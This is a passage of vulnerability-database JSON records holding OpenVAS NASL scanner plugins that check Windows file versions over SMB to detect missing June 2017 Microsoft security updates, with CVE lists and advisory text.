script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17442\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10240.0 - 11.0.10240.17442\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:48:08", "description": "This host is missing a critical security\n update according to Microsoft KB4022715", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022715)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-0173", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8496", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-8498", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0216", "CVE-2017-0284", "CVE-2017-0295", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-8515", "CVE-2017-0282", "CVE-2017-8497", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-0215", "CVE-2017-8504", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310810903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810903", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022715)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810903\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8522\", \"CVE-2017-8523\",\n \"CVE-2017-8524\", \"CVE-2017-0215\", \"CVE-2017-0216\", \"CVE-2017-0218\",\n \"CVE-2017-0219\", \"CVE-2017-0282\", \"CVE-2017-8475\", \"CVE-2017-8476\",\n \"CVE-2017-8529\", \"CVE-2017-8530\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8532\", \"CVE-2017-8533\",\n \"CVE-2017-0284\", \"CVE-2017-0285\", \"CVE-2017-8479\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-8548\", \"CVE-2017-8549\", \"CVE-2017-0289\", \"CVE-2017-0291\",\n \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\", \"CVE-2017-8553\",\n \"CVE-2017-0294\", \"CVE-2017-0295\", \"CVE-2017-0296\", \"CVE-2017-8489\",\n \"CVE-2017-0297\", \"CVE-2017-0298\", \"CVE-2017-8490\", \"CVE-2017-8491\",\n \"CVE-2017-8492\", \"CVE-2017-0299\", \"CVE-2017-0300\", \"CVE-2017-8460\",\n \"CVE-2017-8493\", \"CVE-2017-8494\", \"CVE-2017-8496\", \"CVE-2017-8497\",\n \"CVE-2017-8498\", \"CVE-2017-8504\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8465\", \"CVE-2017-8466\", \"CVE-2017-8468\", \"CVE-2017-8515\",\n \"CVE-2017-8517\", \"CVE-2017-0173\", \"CVE-2017-0193\", \"CVE-2017-8473\",\n \"CVE-2017-8474\", \"CVE-2017-8527\", \"CVE-2017-8554\", \"CVE-2017-8575\",\n \"CVE-2017-8576\", \"CVE-2017-8518\");\n script_bugtraq_id(98848, 98849, 98926, 98928, 98930, 98879, 98896, 98897, 98898,\n 98885, 98853, 98903, 98953, 98863, 98819, 98920, 98854, 98845,\n 98820, 98821, 98918, 98914, 98856, 98857, 98862, 98824, 98922,\n 98923, 98858, 98859, 98826, 98932, 98954, 98955, 98929, 98835,\n 98836, 98847, 98860, 98940, 98837, 98904, 98839, 98865, 98840,\n 98867, 98869, 98870, 98884, 98901, 98887, 98850, 98855, 98880,\n 98882, 98886, 98892, 98900, 98818, 98843, 98844, 98846, 98833,\n 98895, 98873, 98878, 98852, 98902, 98933);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 08:44:33 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022715)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - The way JavaScript engines render when handling objects in memory in\n Microsoft browsers.\n\n - The way the Microsoft Edge JavaScript scripting engine handles objects\n in memory.\n\n - Windows kernel improperly initializes objects in memory.\n\n - Windows improperly handles objects in memory.\n\n - Windows Search improperly handles objects in memory.\n\n - Windows Secure Kernel Mode fails to properly handle objects in memory.\n\n - Microsoft Edge Fetch API incorrectly handles a filtered response type.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Microsoft scripting engines do not properly handle objects in memory.\n\n - Microsoft Edge improperly accesses objects in memory.\n\n For more information please check the Reference URL.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code in the context of the current user,\n obtain sensitive information to further compromise the user's system and to\n bypass security.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022715\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1355\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1355\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:28:37", "description": "This host is missing a critical security\n update according to Microsoft KB4022719", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022719)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0286", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-0294", "CVE-2017-8489", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8534", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296", "CVE-2017-0260"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022719)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811173\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0260\", \"CVE-2017-0282\",\n \"CVE-2017-8476\", \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\",\n \"CVE-2017-0283\", \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0286\",\n \"CVE-2017-0287\", \"CVE-2017-8480\", \"CVE-2017-8481\", \"CVE-2017-8534\",\n \"CVE-2017-8543\", \"CVE-2017-8544\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8547\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\",\n \"CVE-2017-0298\", \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\",\n \"CVE-2017-0300\", \"CVE-2017-8462\", \"CVE-2017-8464\", \"CVE-2017-8469\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8524\", \"CVE-2017-8519\",\n \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98853, 98933, 98949, 98810, 98885, 98903,\n 98854, 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821,\n 98914, 98891, 98922, 98857, 98862, 98822, 98824, 98826, 98923,\n 98929, 98858, 98859, 98932, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98900,\n 98818, 98842, 98848, 98849, 98930, 98899);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 16:22:36 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022719)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022719\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are fue to,\n\n - The metafiles (EMF) or documents containing bitmaps rendered out of bounds\n using the BitMapSection(DIBSection) function.\n\n - An issue with updates are not correctly installing all components and\n would prevent them from booting.\n\n - An unsupported hardware notification is shown and Windows Updates not\n scanning, for systems using the AMD Carrizo DDR4 processor.\n\n - An error in Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM,\n Internet Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user and take control of an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022719\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Searchindexer.exe\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"7.0.7601.23834\"))\n{\n report = 'File checked: ' + sysPath + \"\\Searchindexer.exe\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 7.0.7601.23834\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:44", "description": "This host is missing a critical security\n update according to Microsoft KB4022724", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8472", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811171", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811171\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8472\", \"CVE-2017-8473\", \"CVE-2017-8474\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8475\",\n \"CVE-2017-8476\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8477\", \"CVE-2017-8478\", \"CVE-2017-8479\",\n \"CVE-2017-8532\", \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0287\", \"CVE-2017-0288\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0289\", \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\",\n \"CVE-2017-8485\", \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\",\n \"CVE-2017-8488\", \"CVE-2017-8489\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-8490\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0299\",\n \"CVE-2017-0300\", \"CVE-2017-8460\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\", \"CVE-2017-8522\",\n \"CVE-2017-8469\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98851, 98852, 98902, 98933, 98949, 98885, 98853, 98903,\n 98953, 98819, 98920, 98918, 98854, 98845, 98856, 98820, 98821,\n 98914, 98857, 98862, 98824, 98922, 98923, 98858, 98859, 98826,\n 98932, 98929, 98835, 98836, 98847, 98860, 98940, 98837, 98839,\n 98864, 98865, 98840, 98867, 98869, 98870, 98884, 98901, 98887,\n 98900, 98818, 98848, 98849, 98899, 98926, 98842, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 15:20:54 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4022724)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4022724\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - After installing KB3164035, users cannot print enhanced\n metafiles (EMF) or documents containing bitmaps rendered out of bounds using the\n BitMapSection(DIBSection) function.\n\n - Updates were not correctly installing all components and would prevent them from\n booting.\n\n - An unsupported hardware notification is shown and Windows Updates not scanning,\n for systems using the AMD Carrizo DDR4 processor.\n\n - Security updates to Windows kernel, Microsoft Graphics Component, Microsoft\n Uniscribe, Windows kernel-mode drivers, the Windows OS, Windows COM, Internet\n Explorer and Windows Shell.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to gain the same user rights as the current user. If the current user is logged\n on with administrative user rights, an attacker who successfully exploited the\n vulnerability could take control of an affected system. An attacker could then install\n programs. View, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4022724\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22168\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22168\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:42:44", "description": "This host is missing a critical security\n update according to Microsoft KB4022726", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4022726)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8488", "CVE-2017-8531", "CVE-2017-8481", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8482", "CVE-2017-8528", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8553", "CVE-2017-8522", "CVE-2017-8469", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-0300", "CVE-2017-8519", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-0284", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-8529", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4022726)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811154\");\n script_version(\"2019-12-20T12:42:55+0000\");\n script_cve_id(\"CVE-2017-0193\", \"CVE-2017-8473\", \"CVE-2017-8474\", \"CVE-2017-8475\",\n \"CVE-2017-8527\", \"CVE-2017-8528\", \"CVE-2017-0282\", \"CVE-2017-8476\",\n \"CVE-2017-8477\", \"CVE-2017-8529\", \"CVE-2017-8531\", \"CVE-2017-0283\",\n \"CVE-2017-0284\", \"CVE-2017-8478\", \"CVE-2017-8479\", \"CVE-2017-8532\",\n \"CVE-2017-8533\", \"CVE-2017-0285\", \"CVE-2017-0287\", \"CVE-2017-8480\",\n \"CVE-2017-8481\", \"CVE-2017-8543\", \"CVE-2017-0288\", \"CVE-2017-0289\",\n \"CVE-2017-8482\", \"CVE-2017-8483\", \"CVE-2017-8544\", \"CVE-2017-8547\",\n \"CVE-2017-0291\", \"CVE-2017-0292\", \"CVE-2017-8484\", \"CVE-2017-8485\",\n \"CVE-2017-8553\", \"CVE-2017-0294\", \"CVE-2017-0296\", \"CVE-2017-8488\",\n \"CVE-2017-8489\", \"CVE-2017-8490\", \"CVE-2017-0297\", \"CVE-2017-0298\",\n \"CVE-2017-0299\", \"CVE-2017-8491\", \"CVE-2017-8492\", \"CVE-2017-0300\",\n \"CVE-2017-8460\", \"CVE-2017-8493\", \"CVE-2017-8462\", \"CVE-2017-8464\",\n \"CVE-2017-8469\", \"CVE-2017-8470\", \"CVE-2017-8471\", \"CVE-2017-8519\",\n \"CVE-2017-8522\", \"CVE-2017-8524\", \"CVE-2017-8465\", \"CVE-2017-8466\",\n \"CVE-2017-8468\", \"CVE-2017-8517\", \"CVE-2017-8554\");\n script_bugtraq_id(98878, 98852, 98902, 98853, 98933, 98949, 98885, 98903, 98854,\n 98953, 98819, 98920, 98918, 98845, 98856, 98820, 98821, 98914,\n 98922, 98857, 98862, 98824, 98923, 98929, 98858, 98859, 98826,\n 98932, 98835, 98836, 98847, 98860, 98940, 98837, 98839, 98864,\n 98865, 98867, 98840, 98884, 98869, 98870, 98901, 98887, 98850,\n 98900, 98818, 98842, 98848, 98849, 98899, 98926, 98930, 98843,\n 98844, 98846, 98895);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 12:42:55 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 12:08:00 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4022726)\");\n\n 